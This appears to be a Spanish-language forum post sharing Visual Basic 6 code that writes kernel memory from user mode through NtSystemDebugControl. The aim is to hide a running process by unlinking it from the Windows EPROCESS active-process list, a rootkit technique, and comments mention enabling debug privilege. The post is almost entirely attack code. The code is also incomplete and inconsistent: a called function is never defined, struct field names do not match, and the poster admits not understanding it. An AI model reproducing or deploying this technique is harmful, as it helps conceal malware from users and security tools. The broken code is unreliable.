[Aporte chico] VB Inject KM from UM

[Miseryk]

Hola, acá les dejo un code que por ahí les sirve a los que saben mucho, pude arreglarlo un poco pero no entiendo como funciona, lo que hace es injectar kernel mode desde user mode.

Form1:

Código (vb) [Seleccionar] Expandir


Option Explicit

Private Sub Command1_Click()
Dim pEP As Long
Dim le As LIST_ENTRY

pEP = GetEProcess(Text1.Text) 'PID

Call ReadKernelMemory(pEP + &H88, VarPtr(le), 8)    'Dereference LE

MsgBox le.pBlink & vbCrLf & le.pFlink
Stop

'Call RtlAdjustPrivilege(20, 1, 0, 1)
'Also: Make sure you have SeDebug enabled of course.
'Can be easily done with: (20 = SeDebug's priv val)
'Call RtlAdjustPrivilege(20, 1, 0, 1)
'Fun stuff indeed

Call WriteKernelMemory(le.BLink, VarPtr(le.FLink), 4)     'A.FLink = &(C)     AKA: *(B.BLink+0) = le.FLink        This changes A's FLink from the address of B, to the address of C
Call WriteKernelMemory(le.FLink + 4, VarPtr(le.BLink), 4) 'C.Blink = &(A)     AKA: *(B.FLink+4) = le.BLink        This changes C's BLink from the address of B, to the address of A
End Sub

Private Sub Form_Load()
Text1.Text = GetPEBAddress
End Sub


Module1

Código (vb) [Seleccionar] Expandir


Option Explicit

'To modify kernel memory from usermode  you can use the NtSystemDebugControl API function.

'Found it from some chinese forum =].
'You wouldn 't believe the kind of crazy stuff they implement inside of VB6. (Most I cannot understand though because I lack knowledge of ASM.)

'That code has really opened new doors for me and really got me interested in kernel data structures, rootkits, WinDbg, and the book "Subverting the Windows Kernel"
'In any case, here is an example of hiding a process by unlinking it from the _EPROCESS chain at 0x88 (I think WinDbg calls the member ActiveProcessLinks)

Public Type LIST_ENTRY
    pFlink As Long
    pBlink As Long
End Type

'http://forum.sysinternals.com/tip-run-process-in-system-account-scexe_topic16714_post88025.html

Public Declare Function NtSystemDebugControl Lib "NTDLL" (ByVal ControlCode As Long, ByRef InputBuffer As Any, ByVal InputBufferLength As Long, ByRef OutputBuffer As Any, ByVal OutputBufferLength As Long, ByRef ReturnLength As Long) As Long

Public Type MEMORY_CHUNKS
   VirtualAddress As Long
   Buffer As Long
   BufferSize As Long
End Type

Public Const DebugReadVirtualMemory& = 8
Public Const DebugWriteVirtualMemory& = 9

Public Type PROCESS_BASIC_INFORMATION
   ExitStatus As Long 'NTSTATUS
   PebBaseAddress As Long 'PPEB
   AffinityMask As Long 'ULONG_PTR
   BasePriority As Long 'KPRIORITY
   UniqueProcessId As Long 'ULONG_PTR
   InheritedFromUniqueProcessId As Long 'ULONG_PTR
End Type

Public Declare Function ZwQueryInformationProcess Lib "NTDLL.DLL" (ByVal ProcessHandle As Long, ByVal ProcessInformationClass As PROCESSINFOCLASS, ByVal ProcessInformation As Long, ByVal ProcessInformationLength As Long, ByRef ReturnLength As Long) As Long

Public Enum PROCESSINFOCLASS
   ProcessBasicInformation
   ProcessQuotaLimits
   ProcessIoCounters
   ProcessVmCounters
   ProcessTimes
   ProcessBasePriority
   ProcessRaisePriority
   ProcessDebugPort
   ProcessExceptionPort
   ProcessAccessToken
   ProcessLdtInformation
   ProcessLdtSize
   ProcessDefaultHardErrorMode
   ProcessIoPortHandlers '// Note: this is kernel mode only
   ProcessPooledUsageAndLimits
   ProcessWorkingSetWatch
   ProcessUserModeIOPL
   ProcessEnableAlignmentFaultFixup
   ProcessPriorityClass
   ProcessWx86Information
   ProcessHandleCount
   ProcessAffinityMask
   ProcessPriorityBoost
   ProcessDeviceMap
   ProcessSessionInformation
   ProcessForegroundInformation
   ProcessWow64Information
   ProcessImageFileName
   ProcessLUIDDeviceMapsEnabled
   ProcessBreakOnTermination
   ProcessDebugObjectHandle
   ProcessDebugFlags
   ProcessHandleTracing
   ProcessIoPriority
   ProcessExecuteFlags
   ProcessResourceManagement
   ProcessCookie
   ProcessImageInformation
   MaxProcessInfoClass '// MaxProcessInfoClass should always be the last enum
End Enum

Public Declare Function NtCurrentTeb Lib "NTDLL" () As Long

Public Declare Function IsBadReadPtr Lib "kernel32" (ByVal lp As Long, ByVal ucb As Long) As Long

Public Declare Sub RtlMoveMemory Lib "kernel32" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Integer)

Public Function GetPEBAddress() As Long
   On Error GoTo NotSupported
   Dim pbi As PROCESS_BASIC_INFORMATION, Dummy As Long
   
   If ZwQueryInformationProcess(-1&, 0&, VarPtr(pbi), Len(pbi), Dummy) = 0 Then
       GetPEBAddress = pbi.PebBaseAddress
   Else
       GetPEBAddress = GetPEBAddressinXP
   End If
NotSupported:
End Function

Public Function ReadKernelMemory(ByVal VirtualAddress As Long, ByVal Buffer As Long, ByVal BufferSize As Long) As Long
   Dim MemoryChunks As MEMORY_CHUNKS
   MemoryChunks.VirtualAddress = VirtualAddress
   MemoryChunks.Buffer = Buffer
   MemoryChunks.BufferSize = BufferSize
   ReadKernelMemory = NtSystemDebugControl(DebugReadVirtualMemory, MemoryChunks, Len(MemoryChunks), ByVal 0&, 0, ByVal 0&)
End Function

Public Function WriteKernelMemory(ByVal VirtualAddress As Long, ByVal Buffer As Long, ByVal BufferSize As Long) As Long
   Dim MemoryChunks As MEMORY_CHUNKS
   MemoryChunks.VirtualAddress = VirtualAddress
   MemoryChunks.Buffer = Buffer
   MemoryChunks.BufferSize = BufferSize
   WriteKernelMemory = NtSystemDebugControl(DebugWriteVirtualMemory, MemoryChunks, Len(MemoryChunks), ByVal 0&, 0, ByVal 0&)
End Function

Public Function GetPEBAddressinXP() As Long
   On Error GoTo NotSupported 'Windows 9X/Me will occures error
   Dim pTeb As Long, ppPeb As Long
   pTeb = NtCurrentTeb 'get TEB
   
   On Error Resume Next ' on error ignore
   If pTeb = 0 Then Exit Function 'if it has invalid TEB, run away this procedure
   ' +0x030 ProcessEnvironmentBlock : _PEB
   ppPeb = pTeb + &H30&
   'check IsValid
   If IsBadReadPtr(ByVal ppPeb, 4) Then Exit Function
   ' returns PEB
   RtlMoveMemory GetPEBAddress, ByVal ppPeb, 4
NotSupported:
End Function


Los que quieran aportar conocimientos y funcionamientos, bienvenidos sean . Saludos.

Edit:
Falta código que no lo pude conseguir ni completar.